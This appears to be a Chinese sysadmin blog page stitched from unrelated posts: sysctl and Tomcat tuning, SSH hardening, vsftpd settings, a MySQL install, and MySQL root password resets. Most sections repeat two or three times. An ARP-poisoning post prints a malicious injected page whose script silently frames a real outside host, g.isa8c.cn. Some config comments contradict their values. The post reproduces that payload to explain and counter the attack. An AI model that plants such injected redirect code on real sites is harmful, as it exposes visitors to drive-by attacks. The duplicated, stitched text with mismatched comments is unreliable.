在这里让我们一起学习,一起提高!
ulimit -n 8192 ##单一进程允许打开的最大文件数
echo 65532 > /proc/sys/fs/file-max ##Linux系统级的最大打开文件数限制
net.ipv4.ip_local_port_range = 1024 65000 ##将系统对本地端口范围限制设置为1024~65000之间
net.ipv4.ip_conntrack_max = 102400 ##系统对最大跟踪的TCP连接数限制设置为10240
net.ipv4.tcp_syncookies = 1 ##表示开启SYN Cookies。当出现SYN等待队列溢出时,启用cookies来处理,可防范少量SYN攻击,默认为0,表示关闭;
net.ipv4.tcp_keepalive_time = 7200 ##tcp_keepalive_time 值控制 TCP/IP 尝试验证空闲连接是否完好的频率。 如果这段时间内没有活动,则会发送保持活动信号。 如果网络工作正常,而且接收方是活动的,它就会响应。 如果需要对丢失接收方敏感,换句话说,需要更快地发现丢失了接收方,请考虑减小这个值。 如果长期不活动的空闲连接出现次数较多,而丢失接收方的情况出现较少,您可能会要提高该值以减少开销。
net.ipv4.tcp_max_syn_backlog = 1024 ##增大队列SYN最大半连接数、防止SYN攻击、增加未完成连接队列(q0)的最大长度
net.ipv4.tcp_tw_reuse = 1 ##表示开启重用。允许将TIME-WAIT sockets重新用于新的TCP连接,默认为0,表示关闭;
net.ipv4.tcp_tw_recycle = 1 ##表示开启TCP连接中TIME-WAIT sockets的快速回收,默认为0,表示关闭。
net.ipv4.neigh.default.gc_thresh3 = 2048
net.ipv4.neigh.default.gc_thresh2 = 1024
net.ipv4.neigh.default.gc_thresh1 = 256
net.ipv4.conf.default.rp_filter = 1
net.ipv4.conf.default.forwarding = 1
net.ipv4.conf.default.proxy_arp = 0 ##关闭ARP代理
net.core.netdev_max_backlog = 2048 ##该文件表示在每个网络接口接收数据包的速率比内核处理这些包的速率快时,允许送到队列的数据包的最大数目。
net.core.dev_weight = 64
net.ipv4.tcp_rmem = 4096 87380 16777216 ##该文件包含3个整数值,分别是:min,default,max Min:为TCP socket预留用于接收缓冲的内存数量,即使在内存出现紧张情况下TCP socket都至少会有这么多数量的内存用于接收缓冲。Default:为TCP socket预留用于接收缓冲的内存数量,默认情况下该值影响其它协议使用的 net.core.wmem中default的值。该值决定了在tcp_adv_win_scale、tcp_app_win和tcp_app_win的默认值情况下,TCP 窗口大小为65535。Max:为TCP socket预留用于接收缓冲的内存最大值。该值不会影响 net.core.wmem中max的值,今天选择参数 SO_SNDBUF则不受该值影响。缺省设置:4096 87380 174760
net.ipv4.tcp_wmem = 4096 65536 16777216 ##该文件包含3个整数值,分别是:min,default,max Min:为TCP socket预留用于发送缓冲的内存最小值。每个TCP socket都可以使用它。Default:为TCP socket预留用于发送缓冲的内存数量,默认情况下该值会影响其它协议使用的net.core.wmem中default的 值,一般要低于net.core.wmem中default的值。Max:为TCP socket预留用于发送缓冲的内存最大值。该值不会影响net.core.wmem_max,今天选择参数SO_SNDBUF则不受该值影响。默认值为128K。缺省设置:4096 16384 131072
net.ipv4.tcp_rfc1337 = 1 ##这个开关可以启动对于在RFC1337中描述的“tcp的time-wait暗杀危机”问题的修复。启用后,内核将丢弃那些发往time-wait状态TCP套接字的RST包。却省为0。
net.ipv4.tcp_sack = 0 ##该文件表示是否启用有选择的应答(Selective Acknowledgment),这可以通过有选择地应答乱序接收到的报文来提高性能(这样可以让发送者只发送丢失的报文段);(对于广域网通信来说)这个选项应该启用,但是这会增加对 CPU 的占用。
net.ipv4.tcp_fin_timeout = 20 ##timeout_timewait 值确定了在 TCP/IP 可释放已关闭的连接并复用其资源之前,必须等待的时间。 关闭和释放之间的时间间隔称为 TIME_WAIT 状态或最长分段生命周期的两倍(2MSL)状态。 在此期间,重新打开客户机和服务器之间的连接比新建一个连接的开销要小。 通过减小该项的值,TCP/IP 可更快地释放已关闭的连接,并可为新连接提供更多的资源。 如果由于多个连接处于 TIME_WAIT 状态导致吞吐量较低,从而正在运行的应用程序需要快速释放连接、创建新的连接或是进行调整,请调整这个参数。 对于本端断开的socket连接,TCP保持在FIN-WAIT-2状态的时间。对方可能会断开连接或一直不结束连接或不可预料的进程死亡。默认值为 60 秒。过去在2.2版本的内核中是 180 秒。您可以设置该值,但需要注意,如果您的机器为负载很重的web服务器,您可能要冒内存被大量无效数据报填满的风险,FIN-WAIT-2 sockets 的危险性低于 FIN-WAIT-1,因为它们最多只吃 1.5K的内存,但是它们存在时间更长。另外参考 tcp_max_orphans。
net.ipv4.tcp_keepalive_probes = 5 ##tcp_keepalive_probes 值定义了 TCP/IP 通过现有连接重新发送未返回应答的保持活动的消息次数。 如果您的网络性能很差,可能需要提高该值以保持有效的通信。 如果您的网络性能很好,可以减小该值以减少验证接收方是否丢失所花费的时间。
net.ipv4.tcp_max_orphans = 32768 ##系统所能处理不属于任何进程的TCP sockets最大数量。假如超过这个数量,那么不属于任何进程的连接会被立即reset,并同时显示警告信息。之所以要设定这个限制,纯粹为了抵御那些简单的 DoS 攻击,千万不要依赖这个或是人为的降低这个限制。
net.core.optmem_max = 20480 ##该文件表示每个套接字所允许的最大缓冲区的大小。
net.core.rmem_default = 16777216 ##该文件指定了接收套接字缓冲区大小的缺省值(以字节为单位)。
net.core.rmem_max = 16777216 ##该文件指定了接收套接字缓冲区大小的最大值(以字节为单位)。
net.core.wmem_default = 16777216 ##该文件指定了发送套接字缓冲区大小的缺省值(以字节为单位)。
net.core.wmem_max = 16777216 ##该文件指定了发送套接字缓冲区大小的最大值(以字节为单位)。
net.core.somaxconn = 1024 ##调高系统同时发起并发TCP连接数;可能需要提高连接储备值,以应对大量突发入局连接请求的情况。 如果同时接收到大量连接请求,使用较大的值会提高受支持的暂挂连接的数量,从而可减少连接失败的数量。
net.ipv4.tcp_orphan_retries = 1 ##在近端丢弃TCP连接之前,要进行多少次重试。默认值是 7 个,相当于 50秒–16分钟,视 RTO 而定。如果您的系统是负载很大的web服务器,那么也许需要降低该值,这sockets 可能会耗费大量的资源。另外参考tcp_max_orphans。
net.ipv4.tcp_max_tw_buckets = 18000 ##系统同时保持timewait套接字的最大数量。系统在同时所处理的最大timewait sockets 数目。如果超过此数的话,time-wait socket 会被立即砍除并且显示警告信息。之所以要设定这个限制,纯粹为了抵御那些简单的 DoS 攻击,千万不要人为的降低这个限制,不过,如果网络条件需要比默认值更多,则可以提高它(或许还要增加内存)。
net.ipv4.ip_forward = 0 ##该文件表示是否打开IP转发。0,禁止1,转发
net.ipv4.conf.default.proxy_arp = 0
net.ipv4.conf.all.rp_filter = 1 ##开启IP源地址验证,防止IP地址欺骗,在任何情况下都应开启,默认关闭
kernel.sysrq = 1 ##启用SsyRq
net.ipv4.conf.default.send_redirects = 1 ##Linux的路由重定向
net.ipv4.conf.all.send_redirects = 0 ##Linux的路由重定向 0为关闭
less /etc/security/limits.conf
* soft nofile 32768
* hard nofile 32768
###重启后用户的最大打开文件数就变成 32768 了,当然你也可以看情况再加大。
Tomcat 部分配置:
enableLookups="false" redirectPort="8443" acceptCount="1200"
connectionTimeout="30000" disableUploadTimeout="true" minProcessors="100" maxProcessors="1200"/>
echo 65532 > /proc/sys/fs/file-max ##Linux系统级的最大打开文件数限制
net.ipv4.ip_local_port_range = 1024 65000 ##将系统对本地端口范围限制设置为1024~65000之间
net.ipv4.ip_conntrack_max = 102400 ##系统对最大跟踪的TCP连接数限制设置为10240
net.ipv4.tcp_syncookies = 1 ##表示开启SYN Cookies。当出现SYN等待队列溢出时,启用cookies来处理,可防范少量SYN攻击,默认为0,表示关闭;
net.ipv4.tcp_keepalive_time = 7200 ##tcp_keepalive_time 值控制 TCP/IP 尝试验证空闲连接是否完好的频率。 如果这段时间内没有活动,则会发送保持活动信号。 如果网络工作正常,而且接收方是活动的,它就会响应。 如果需要对丢失接收方敏感,换句话说,需要更快地发现丢失了接收方,请考虑减小这个值。 如果长期不活动的空闲连接出现次数较多,而丢失接收方的情况出现较少,您可能会要提高该值以减少开销。
net.ipv4.tcp_max_syn_backlog = 1024 ##增大队列SYN最大半连接数、防止SYN攻击、增加未完成连接队列(q0)的最大长度
net.ipv4.tcp_tw_reuse = 1 ##表示开启重用。允许将TIME-WAIT sockets重新用于新的TCP连接,默认为0,表示关闭;
net.ipv4.tcp_tw_recycle = 1 ##表示开启TCP连接中TIME-WAIT sockets的快速回收,默认为0,表示关闭。
net.ipv4.neigh.default.gc_thresh3 = 2048
net.ipv4.neigh.default.gc_thresh2 = 1024
net.ipv4.neigh.default.gc_thresh1 = 256
net.ipv4.conf.default.rp_filter = 1
net.ipv4.conf.default.forwarding = 1
net.ipv4.conf.default.proxy_arp = 0 ##关闭ARP代理
net.core.netdev_max_backlog = 2048 ##该文件表示在每个网络接口接收数据包的速率比内核处理这些包的速率快时,允许送到队列的数据包的最大数目。
net.core.dev_weight = 64
net.ipv4.tcp_rmem = 4096 87380 16777216 ##该文件包含3个整数值,分别是:min,default,max Min:为TCP socket预留用于接收缓冲的内存数量,即使在内存出现紧张情况下TCP socket都至少会有这么多数量的内存用于接收缓冲。Default:为TCP socket预留用于接收缓冲的内存数量,默认情况下该值影响其它协议使用的 net.core.wmem中default的值。该值决定了在tcp_adv_win_scale、tcp_app_win和tcp_app_win的默认值情况下,TCP 窗口大小为65535。Max:为TCP socket预留用于接收缓冲的内存最大值。该值不会影响 net.core.wmem中max的值,今天选择参数 SO_SNDBUF则不受该值影响。缺省设置:4096 87380 174760
net.ipv4.tcp_wmem = 4096 65536 16777216 ##该文件包含3个整数值,分别是:min,default,max Min:为TCP socket预留用于发送缓冲的内存最小值。每个TCP socket都可以使用它。Default:为TCP socket预留用于发送缓冲的内存数量,默认情况下该值会影响其它协议使用的net.core.wmem中default的 值,一般要低于net.core.wmem中default的值。Max:为TCP socket预留用于发送缓冲的内存最大值。该值不会影响net.core.wmem_max,今天选择参数SO_SNDBUF则不受该值影响。默认值为128K。缺省设置:4096 16384 131072
net.ipv4.tcp_rfc1337 = 1 ##这个开关可以启动对于在RFC1337中描述的“tcp的time-wait暗杀危机”问题的修复。启用后,内核将丢弃那些发往time-wait状态TCP套接字的RST包。却省为0。
net.ipv4.tcp_sack = 0 ##该文件表示是否启用有选择的应答(Selective Acknowledgment),这可以通过有选择地应答乱序接收到的报文来提高性能(这样可以让发送者只发送丢失的报文段);(对于广域网通信来说)这个选项应该启用,但是这会增加对 CPU 的占用。
net.ipv4.tcp_fin_timeout = 20 ##timeout_timewait 值确定了在 TCP/IP 可释放已关闭的连接并复用其资源之前,必须等待的时间。 关闭和释放之间的时间间隔称为 TIME_WAIT 状态或最长分段生命周期的两倍(2MSL)状态。 在此期间,重新打开客户机和服务器之间的连接比新建一个连接的开销要小。 通过减小该项的值,TCP/IP 可更快地释放已关闭的连接,并可为新连接提供更多的资源。 如果由于多个连接处于 TIME_WAIT 状态导致吞吐量较低,从而正在运行的应用程序需要快速释放连接、创建新的连接或是进行调整,请调整这个参数。 对于本端断开的socket连接,TCP保持在FIN-WAIT-2状态的时间。对方可能会断开连接或一直不结束连接或不可预料的进程死亡。默认值为 60 秒。过去在2.2版本的内核中是 180 秒。您可以设置该值,但需要注意,如果您的机器为负载很重的web服务器,您可能要冒内存被大量无效数据报填满的风险,FIN-WAIT-2 sockets 的危险性低于 FIN-WAIT-1,因为它们最多只吃 1.5K的内存,但是它们存在时间更长。另外参考 tcp_max_orphans。
net.ipv4.tcp_keepalive_probes = 5 ##tcp_keepalive_probes 值定义了 TCP/IP 通过现有连接重新发送未返回应答的保持活动的消息次数。 如果您的网络性能很差,可能需要提高该值以保持有效的通信。 如果您的网络性能很好,可以减小该值以减少验证接收方是否丢失所花费的时间。
net.ipv4.tcp_max_orphans = 32768 ##系统所能处理不属于任何进程的TCP sockets最大数量。假如超过这个数量,那么不属于任何进程的连接会被立即reset,并同时显示警告信息。之所以要设定这个限制,纯粹为了抵御那些简单的 DoS 攻击,千万不要依赖这个或是人为的降低这个限制。
net.core.optmem_max = 20480 ##该文件表示每个套接字所允许的最大缓冲区的大小。
net.core.rmem_default = 16777216 ##该文件指定了接收套接字缓冲区大小的缺省值(以字节为单位)。
net.core.rmem_max = 16777216 ##该文件指定了接收套接字缓冲区大小的最大值(以字节为单位)。
net.core.wmem_default = 16777216 ##该文件指定了发送套接字缓冲区大小的缺省值(以字节为单位)。
net.core.wmem_max = 16777216 ##该文件指定了发送套接字缓冲区大小的最大值(以字节为单位)。
net.core.somaxconn = 1024 ##调高系统同时发起并发TCP连接数;可能需要提高连接储备值,以应对大量突发入局连接请求的情况。 如果同时接收到大量连接请求,使用较大的值会提高受支持的暂挂连接的数量,从而可减少连接失败的数量。
net.ipv4.tcp_orphan_retries = 1 ##在近端丢弃TCP连接之前,要进行多少次重试。默认值是 7 个,相当于 50秒–16分钟,视 RTO 而定。如果您的系统是负载很大的web服务器,那么也许需要降低该值,这sockets 可能会耗费大量的资源。另外参考tcp_max_orphans。
net.ipv4.tcp_max_tw_buckets = 18000 ##系统同时保持timewait套接字的最大数量。系统在同时所处理的最大timewait sockets 数目。如果超过此数的话,time-wait socket 会被立即砍除并且显示警告信息。之所以要设定这个限制,纯粹为了抵御那些简单的 DoS 攻击,千万不要人为的降低这个限制,不过,如果网络条件需要比默认值更多,则可以提高它(或许还要增加内存)。
net.ipv4.ip_forward = 0 ##该文件表示是否打开IP转发。0,禁止1,转发
net.ipv4.conf.default.proxy_arp = 0
net.ipv4.conf.all.rp_filter = 1 ##开启IP源地址验证,防止IP地址欺骗,在任何情况下都应开启,默认关闭
kernel.sysrq = 1 ##启用SsyRq
net.ipv4.conf.default.send_redirects = 1 ##Linux的路由重定向
net.ipv4.conf.all.send_redirects = 0 ##Linux的路由重定向 0为关闭
less /etc/security/limits.conf
* soft nofile 32768
* hard nofile 32768
###重启后用户的最大打开文件数就变成 32768 了,当然你也可以看情况再加大。
Tomcat 部分配置:
enableLookups="false" redirectPort="8443" acceptCount="1200"
connectionTimeout="30000" disableUploadTimeout="true" minProcessors="100" maxProcessors="1200"/>
我们网站最近所有页面都变形了,包括后台,我当时就挺纳闷,后台我都限定IP访问了,怎么可能被挂木马呢?难道是调用的文件出问题了?查找所有代码以后也没有发现挂马代码。但是查看每个页面都变成了类似下面的代码:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://g.isa8c.cn/d5/x4/index.htm?03";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="INJECT_PAGE_URL">
<frame name="hi" src="">
</frameset>
</html>
网上说,这是一种ARP病毒的症状,如果页面出现类似代码,很有可能是所在机子的局域网内有机器中了ARP木马,解决此问题的方法:
网关静态绑定你的服务器的MAC地址或者本机IP绑定MAC地址。
建立静态IP/MAC捆绑的方法是:建立/etc/ethers文件,其中包含正确的IP/MAC对应关系,格式如下:
192.168.2.32 08:00:4E:B0:24:47
然后再/etc/rc.d/rc.local最后添加:
arp -f
即可
操作如下:
# vi /etc/ethers
arp -s 123.123.123.111 00:11:56:6F:87:D3
#arp -f /etc/ethers
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://g.isa8c.cn/d5/x4/index.htm?03";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="INJECT_PAGE_URL">
<frame name="hi" src="">
</frameset>
</html>
网上说,这是一种ARP病毒的症状,如果页面出现类似代码,很有可能是所在机子的局域网内有机器中了ARP木马,解决此问题的方法:
网关静态绑定你的服务器的MAC地址或者本机IP绑定MAC地址。
建立静态IP/MAC捆绑的方法是:建立/etc/ethers文件,其中包含正确的IP/MAC对应关系,格式如下:
192.168.2.32 08:00:4E:B0:24:47
然后再/etc/rc.d/rc.local最后添加:
arp -f
即可
操作如下:
# vi /etc/ethers
arp -s 123.123.123.111 00:11:56:6F:87:D3
#arp -f /etc/ethers
改之前先建立一个登录的用户
1,只允许某个IP登录,拒绝其他所有IP
在 /etc/hosts.allow 写:
sshd: 192.168.1.207
在 /etc/hosts.deny 写:
sshd: ALL
2,禁止某个用户通过ssh登录
在/etc/ssh/sshd_conf添加
AllowUsers 用户名
或者
AllowGroups 组名
或者
DenyUsers 用户名
3、修改默认端口:默认Port为22,并且已经注释掉了;修改是把注释去掉,并修改成其它的端口。
4、禁止root用户远程登陆:修改PermitRootLogin,默认为yes且注释掉了;修改是把注释去掉,并改成no。
5、PermitEmptyPasswords no不允许空密码用户login
1,只允许某个IP登录,拒绝其他所有IP
在 /etc/hosts.allow 写:
sshd: 192.168.1.207
在 /etc/hosts.deny 写:
sshd: ALL
2,禁止某个用户通过ssh登录
在/etc/ssh/sshd_conf添加
AllowUsers 用户名
或者
AllowGroups 组名
或者
DenyUsers 用户名
3、修改默认端口:默认Port为22,并且已经注释掉了;修改是把注释去掉,并修改成其它的端口。
4、禁止root用户远程登陆:修改PermitRootLogin,默认为yes且注释掉了;修改是把注释去掉,并改成no。
5、PermitEmptyPasswords no不允许空密码用户login
ssh是一个好的LInux、Solairs、Unix、FreeBSD、等Unix系列操作系统的远程登录方式,当然任何东西都是好漏洞的,为了指定一个安全的SSH登录,我们可以用以下方法去制定一个安全的SSH,提高系统的安全性
1.限制ssh远程登录的时候直接以root帐号登录:
修改配置文件/etc/ssh/sshd_config,加上一个record: PermitRootLogin no
这样设置后重启ssh service,/etc/init.d/sshd restart即可生效,生效后我们就不能直接以root的方式登录了,我们需要用一个普通的帐号来登录,然后用su来切换到root帐号,注意 su和su - 是有一点小小区别的。(据本人观察,关键在于环境变量的不同,su -的环境变量更全一些)
2.更改SSH的默认端口,
用过Linux的都知道,ssh的登录一般默认端口是22号,这样可能有黑客就喜欢去scan那些常用的端口,然后尝试用各种方法攻入我们的服务器,修改方法如下
仍然是修改/etc/ssh/sshd_config 加上一个record:Port 8022
然后重启ssh服务,我们以后要以ssh登录服务器的时候就需要用8022端口来连接我们的服务器了。
3. 只允许通过指定的网络接口来访问SSH服务,(如果一服务器有多个IP的时候)
仍然是修改/etc/ssh/sshd_config 加上一个record:ListenAddress 192.168.1.15
这样就只允许别人通过连接改服务器上的网络接口获得的IP192.168.1.15去连接该服务器的ssh服务了。
4.限制空密码登录
如果有的系统account设置的是空密码,如果ssh没有做相应的设置,那么登录ssh的时候就算帐号的密码是空的也是可以登录的,我们仍该设置上面的那个文件 ,加上一个record:PermitEmptyPasswords no即可
5. 只允许某些用户通过 ssh 访问主机. user@host 也可用于限制指定用户通过指定主机访问.
AllowUsers alex ref me@hostname
仅允许alex ref 或者hostname这个机器上的me这个user去连接该服务器的ssh服务
6. 仅允许某个组的成员通过 ssh 访问主机. AllowGroups 和 AllowUsers 对于拒绝访问主机有同样的效果. 当称它们为 "DenyUsers" 和 "DenyGroups" 时不要觉得奇怪.
AllowGroups wheel admin
7.禁用版本1协议, 因为其设计缺陷, 很容易使密码被黑掉. 更多信息, 参阅 ssh协议问题报告 或 Xforce 通告.
Protocol 2
8.为用户连接到 ssh 服务器增加一个标题(它将从文件读取), 在一些国家, 登入给定系统前, 给出未经授权或者用户监视警告信息, 将会受到法律的保护.
Banner /etc/some_file
1.限制ssh远程登录的时候直接以root帐号登录:
修改配置文件/etc/ssh/sshd_config,加上一个record: PermitRootLogin no
这样设置后重启ssh service,/etc/init.d/sshd restart即可生效,生效后我们就不能直接以root的方式登录了,我们需要用一个普通的帐号来登录,然后用su来切换到root帐号,注意 su和su - 是有一点小小区别的。(据本人观察,关键在于环境变量的不同,su -的环境变量更全一些)
2.更改SSH的默认端口,
用过Linux的都知道,ssh的登录一般默认端口是22号,这样可能有黑客就喜欢去scan那些常用的端口,然后尝试用各种方法攻入我们的服务器,修改方法如下
仍然是修改/etc/ssh/sshd_config 加上一个record:Port 8022
然后重启ssh服务,我们以后要以ssh登录服务器的时候就需要用8022端口来连接我们的服务器了。
3. 只允许通过指定的网络接口来访问SSH服务,(如果一服务器有多个IP的时候)
仍然是修改/etc/ssh/sshd_config 加上一个record:ListenAddress 192.168.1.15
这样就只允许别人通过连接改服务器上的网络接口获得的IP192.168.1.15去连接该服务器的ssh服务了。
4.限制空密码登录
如果有的系统account设置的是空密码,如果ssh没有做相应的设置,那么登录ssh的时候就算帐号的密码是空的也是可以登录的,我们仍该设置上面的那个文件 ,加上一个record:PermitEmptyPasswords no即可
5. 只允许某些用户通过 ssh 访问主机. user@host 也可用于限制指定用户通过指定主机访问.
AllowUsers alex ref me@hostname
仅允许alex ref 或者hostname这个机器上的me这个user去连接该服务器的ssh服务
6. 仅允许某个组的成员通过 ssh 访问主机. AllowGroups 和 AllowUsers 对于拒绝访问主机有同样的效果. 当称它们为 "DenyUsers" 和 "DenyGroups" 时不要觉得奇怪.
AllowGroups wheel admin
7.禁用版本1协议, 因为其设计缺陷, 很容易使密码被黑掉. 更多信息, 参阅 ssh协议问题报告 或 Xforce 通告.
Protocol 2
8.为用户连接到 ssh 服务器增加一个标题(它将从文件读取), 在一些国家, 登入给定系统前, 给出未经授权或者用户监视警告信息, 将会受到法律的保护.
Banner /etc/some_file
#不允许匿名登陆
anonymous_enable=NO
#启用本地用户登陆
local_enable=YES
write_enable=YES
#设置本地用户的文件生成掩码为022,默认为077
local_umask=022
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#不显示该目录下的.message隐含文件的内容
#dirmessage_enable=YES
#启动上传和下载日志
xferlog_enable=YES
#启用ftp数据端口的连接请求
connect_from_port_20=YES
#屏蔽匿名用户相关配置
#chown_uploads=YES
#chown_username=whoever
#ftp日志文件位置及是否使用标准格式
xferlog_file=/var/log/vsftpd.log
xferlog_std_format=YES
#空闲用户和会话空闲3分钟后中断
idle_session_timeout=180
#数据连接2分钟后中断
data_connection_timeout=120
#nopriv_user=ftpsecure
#async_abor_enable=YES
#启用ascii方式上传下载
ascii_upload_enable=NO
ascii_download_enable=NO
#简单的欢迎信息
ftpd_banner=Welcome to www.net.cn FTP service.
#deny_email_enable=YES
#banned_email_file=/etc/vsftpd.banned_emails
#设置用户只能在自家内浏览
chroot_local_user=YES
#chroot_list_enable=YES
#chroot_list_file=/etc/vsftpd.chroot_list
# 使用ls-R命令已防止浪费大量的服务器资源
ls_recurse_enable=YES
pam_service_name=vsftpd
# /etc/vsftpd.user_list文件中所列用户不能访问ftp server
userlist_enable=YES
#以standalone 模式运行
listen=YES
tcp_wrappers=YES
# 给使用pasv模式的ftp用户开放的端口
pasv_max_port=40030
pasv_min_port=40000
anonymous_enable=NO
#启用本地用户登陆
local_enable=YES
write_enable=YES
#设置本地用户的文件生成掩码为022,默认为077
local_umask=022
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#不显示该目录下的.message隐含文件的内容
#dirmessage_enable=YES
#启动上传和下载日志
xferlog_enable=YES
#启用ftp数据端口的连接请求
connect_from_port_20=YES
#屏蔽匿名用户相关配置
#chown_uploads=YES
#chown_username=whoever
#ftp日志文件位置及是否使用标准格式
xferlog_file=/var/log/vsftpd.log
xferlog_std_format=YES
#空闲用户和会话空闲3分钟后中断
idle_session_timeout=180
#数据连接2分钟后中断
data_connection_timeout=120
#nopriv_user=ftpsecure
#async_abor_enable=YES
#启用ascii方式上传下载
ascii_upload_enable=NO
ascii_download_enable=NO
#简单的欢迎信息
ftpd_banner=Welcome to www.net.cn FTP service.
#deny_email_enable=YES
#banned_email_file=/etc/vsftpd.banned_emails
#设置用户只能在自家内浏览
chroot_local_user=YES
#chroot_list_enable=YES
#chroot_list_file=/etc/vsftpd.chroot_list
# 使用ls-R命令已防止浪费大量的服务器资源
ls_recurse_enable=YES
pam_service_name=vsftpd
# /etc/vsftpd.user_list文件中所列用户不能访问ftp server
userlist_enable=YES
#以standalone 模式运行
listen=YES
tcp_wrappers=YES
# 给使用pasv模式的ftp用户开放的端口
pasv_max_port=40030
pasv_min_port=40000
改之前先建立一个登录的用户
1,只允许某个IP登录,拒绝其他所有IP
在 /etc/hosts.allow 写:
sshd: 192.168.1.207
在 /etc/hosts.deny 写:
sshd: ALL
2,禁止某个用户通过ssh登录
在/etc/ssh/sshd_conf添加
AllowUsers 用户名
或者
AllowGroups 组名
或者
DenyUsers 用户名
3、修改默认端口:默认Port为22,并且已经注释掉了;修改是把注释去掉,并修改成其它的端口。
4、禁止root用户远程登陆:修改PermitRootLogin,默认为yes且注释掉了;修改是把注释去掉,并改成no。
5、PermitEmptyPasswords no不允许空密码用户login
1,只允许某个IP登录,拒绝其他所有IP
在 /etc/hosts.allow 写:
sshd: 192.168.1.207
在 /etc/hosts.deny 写:
sshd: ALL
2,禁止某个用户通过ssh登录
在/etc/ssh/sshd_conf添加
AllowUsers 用户名
或者
AllowGroups 组名
或者
DenyUsers 用户名
3、修改默认端口:默认Port为22,并且已经注释掉了;修改是把注释去掉,并修改成其它的端口。
4、禁止root用户远程登陆:修改PermitRootLogin,默认为yes且注释掉了;修改是把注释去掉,并改成no。
5、PermitEmptyPasswords no不允许空密码用户login
首选查看是否安装了linux自带的mysql,如果有可以卸载后再安装。
#rpm -qa|grep -i mysql
卸载mysql
#rpm -ev mysqlclient10-3.23.58-4.RHEL4.1
rpm -ev mysql-4.1.12-3.RHEL4.1
如果出现如下错误:
#rpm -e mysql-4.1.12-3.RHEL4.1
error: Failed dependencies:
libmysqlclient.so.14 is needed by (installed) cyrus-sasl-sql-2.1.19-5.EL4.i386
libmysqlclient.so.14 is needed by (installed) dovecot-0.99.11-2.EL4.1.i386
那么,你需要按倒序来先删除dovecot-0.99.11-2.EL4.1.i386,然后是cyrus-sasl-sql-2.1.19-5.EL4.i386,最后,你可以完全删除mysql-devel,其他的类似。
#rpm -e cyrus-sasl-sql-2.1.19-5.EL4.i386
#rpm -e libmysqlclient.so.14
#rpm -ev mysql-4.1.12-3.RHEL4.1
下面开始安装mysql
#tar -zvxf mysql-5.0.40.tar.gz
#id mysql //查看是否建立mysql用户名和用户组,如果没有,请先建立。
#groupadd mysql
#useradd -g mysql mysql
#cd mysql-5.0.40
#./configure -prefix=/usr/local/mysql -with-charset=gbk -with-extra-charsets=all //默认字符集是GBK,带扩展字符集。
#make
#make install
#cp support-files/my-medium.cnf /etc/my.cnf
#./scripts/mysql_install_db --user=mysql
//初试化表并且规定用mysql用户来访问。初始化表以后就开始给mysql和root用户设定访问权限
#chown -R root /usr/local/mysql
#chown -R mysql /usr/local/mysql/var
#chown -R mysql /usr/local/mysql/var/.
#chown -R mysql /usr/local/mysql/var/
#chown -R mysql /usr/local/mysql/var/mysql
#chown -R mysql /usr/local/mysql/var/mysql/
#chown -R mysql /usr/local/mysql/var/mysql/.
#chgrp -R mysql /usr/local/mysql
# cp support-files/mysql.server /etc/rc.d/init.d/mysqld
# chmod 700 /etc/init.d/mysqld
# chkconfig --add mysqld
# chkconfig --level 345 mysqld on
# service mysqld start
# netstat -atln 查看mysql端口3306是否打开,如果打开说明安装成功
设置mysql 中root密码:/usr/local/mysql/bin/mysqladmin -u root password 'new-password'
#rpm -qa|grep -i mysql
卸载mysql
#rpm -ev mysqlclient10-3.23.58-4.RHEL4.1
rpm -ev mysql-4.1.12-3.RHEL4.1
如果出现如下错误:
#rpm -e mysql-4.1.12-3.RHEL4.1
error: Failed dependencies:
libmysqlclient.so.14 is needed by (installed) cyrus-sasl-sql-2.1.19-5.EL4.i386
libmysqlclient.so.14 is needed by (installed) dovecot-0.99.11-2.EL4.1.i386
那么,你需要按倒序来先删除dovecot-0.99.11-2.EL4.1.i386,然后是cyrus-sasl-sql-2.1.19-5.EL4.i386,最后,你可以完全删除mysql-devel,其他的类似。
#rpm -e cyrus-sasl-sql-2.1.19-5.EL4.i386
#rpm -e libmysqlclient.so.14
#rpm -ev mysql-4.1.12-3.RHEL4.1
下面开始安装mysql
#tar -zvxf mysql-5.0.40.tar.gz
#id mysql //查看是否建立mysql用户名和用户组,如果没有,请先建立。
#groupadd mysql
#useradd -g mysql mysql
#cd mysql-5.0.40
#./configure -prefix=/usr/local/mysql -with-charset=gbk -with-extra-charsets=all //默认字符集是GBK,带扩展字符集。
#make
#make install
#cp support-files/my-medium.cnf /etc/my.cnf
#./scripts/mysql_install_db --user=mysql
//初试化表并且规定用mysql用户来访问。初始化表以后就开始给mysql和root用户设定访问权限
#chown -R root /usr/local/mysql
#chown -R mysql /usr/local/mysql/var
#chown -R mysql /usr/local/mysql/var/.
#chown -R mysql /usr/local/mysql/var/
#chown -R mysql /usr/local/mysql/var/mysql
#chown -R mysql /usr/local/mysql/var/mysql/
#chown -R mysql /usr/local/mysql/var/mysql/.
#chgrp -R mysql /usr/local/mysql
# cp support-files/mysql.server /etc/rc.d/init.d/mysqld
# chmod 700 /etc/init.d/mysqld
# chkconfig --add mysqld
# chkconfig --level 345 mysqld on
# service mysqld start
# netstat -atln 查看mysql端口3306是否打开,如果打开说明安装成功
设置mysql 中root密码:/usr/local/mysql/bin/mysqladmin -u root password 'new-password'
整理了以下四种在MySQL中修改root密码的方法,可能对大家有所帮助!
方法1: 用SET PASSWORD命令
mysql -u root
mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('newpass');
方法2:用mysqladmin
mysqladmin -u root password "newpass"
如果root已经设置过密码,采用如下方法
mysqladmin -u root password oldpass "newpass"
方法3: 用UPDATE直接编辑user表
mysql -u root
mysql> use mysql;
mysql> UPDATE user SET Password = PASSWORD('newpass') WHERE user = 'root';
mysql> FLUSH PRIVILEGES;
在丢失root密码的时候,可以这样
mysqld_safe --skip-grant-tables&
mysql -u root mysql
mysql> UPDATE user SET password=PASSWORD("new password") WHERE user='root';
mysql> FLUSH PRIVILEGES;
方法1: 用SET PASSWORD命令
mysql -u root
